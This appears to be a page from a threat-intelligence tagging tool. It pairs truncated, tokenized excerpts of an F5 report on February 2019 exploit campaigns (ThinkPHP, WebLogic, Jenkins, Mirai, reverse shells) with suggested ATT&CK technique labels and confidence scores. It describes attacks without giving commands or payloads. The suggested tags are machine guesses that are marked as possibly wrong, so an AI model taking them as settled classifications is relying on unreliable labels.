"intelligence / vulnerabilities - - exploits - - and - malware - driving - attack - campaigns -. html ). - other targeted vulnerabilities in february were jenkins cli signedobject deserialization ( cve - 2017 - 1000353 ), elasticsearch remote code execution vulnerability ( cve - 2…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
96%
"actor instructed the server to download and execute a malicious file with a. jpg extension. figure 10. vulnerable server downloaded and executed the malicious jpg file the malicious jpg file downloaded on a vulnerable server contains two functions ( b, d ) with distinct purposes.…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
83%
"campaign for oracle weblogic. the vulnerability was first published in 2017 and since then, we have seen various threat actors looking to exploit it. in this campaign, the threat actor sent a python payload, which contained a base64 - encoded string. figure 8. oracle weblogic wls…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
77%
"- attack - thingbots - threaten - intern. html ). ) in the example shown in figure 3, a known threat actor targeted thinkphp servers ; figure 4 shows the contents of the downloaded file “ infinity. sh ”. figure 3. a new threat actor targeting thinkphp servers figure 4. contents o…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1588.006Vulnerabilities
76%
"vulnerabilities, exploits, and malware driving attack campaigns in february 2019 security researchers at f5 networks constantly monitor web traffic at various locations throughout the world. this allows us to detect current “ in the wild ” malware, and to get an insight into a th…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1525Implant Internal Image
38%
"instances. ” a user can use instance metadata to configure or manage the running instance. because instance metadata is available from within a running instance, the amazon ec2 console or the aws cli are not needed. to view all categories of instance metadata from within a runnin…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
30%
"attempted reconnaissance, in february all of the campaigns attempted to exploit the vulnerable server by either running a variant of the mirai botnet or trying to create a reverse shell back to the threat actor. to learn more details about this vulnerability, please refer to our …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Continuing the trend from January, threat actor activity in February focused heavily on exploiting a ThinkPHP remote code execution vulnerability.